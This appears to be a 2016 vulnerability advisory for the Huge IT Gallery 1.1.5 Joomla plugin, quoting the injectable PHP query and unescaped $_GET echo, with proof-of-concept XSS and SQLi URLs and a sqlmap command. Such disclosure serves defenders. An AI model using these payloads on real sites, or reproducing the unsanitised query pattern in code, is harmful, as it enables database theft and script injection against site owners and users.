Joomla Huge IT Gallery 1.1.5 Cross Site Scripting / SQL Injection

2016.07.26
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89
CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla Author: Larry W. Cashdollar, @_larry0 Elitza Neytcheva, @E1337za Date: 2016-07-14 Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro Vendor: huge-it.com Vendor Notified: 2016-07-15, fixed v1.1.6 Vendor Contact: info@huge-it.com Advisory: http://www.vapidlabs.com/advisory.php?v=164 Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links. Vulnerability: The attacker does not need to be logged in to Joomla to exploit this vulnerability: SQL in code via id parameter: ./administrator/components/com_gallery/models/gallery.php 51 public function getPropertie() { 52 $db = JFactory::getDBO(); 53 $id_cat = JRequest::getVar('id'); 54 $query = $db->getQuery(true); 55 $query->select('#__huge_itgallery_images.name as name,' 56 . '#__huge_itgallery_images.id ,' 57 . '#__huge_itgallery_gallerys.name as portName,' 58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width'); 59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images')); 60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat); 61 $query->order('ordering desc'); 62 64 $db->setQuery($query); 65 $results = $db->loadObjectList(); 66 return $results; 67 } XSS is here: root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \; ./administrator/components/com_gallery/views/gallery/tmpl/default.php root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \; 256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" > CVE-2016-1000113 Exploit Code: XSS PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E SQLi PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE http://192.168.0.125/index.php?option=com_gallery&id=HERE Video by 'Exploiter': https://www.youtube.com/watch?v=U67iQ3-xcho $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top